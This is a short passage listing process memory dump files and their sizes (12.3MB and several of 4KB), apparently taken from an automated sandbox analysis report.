                                                    • memory/5956-255-0x0000000001EE0000-0x0000000002B2A000-memory.dmp

                                                      Filesize

                                                      12.3MB

                                                    • memory/5956-256-0x0000000005420000-0x0000000005421000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/5956-258-0x0000000006390000-0x0000000006391000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/6112-259-0x0000000000240000-0x0000000000241000-memory.dmp

                                                      Filesize

                                                      4KB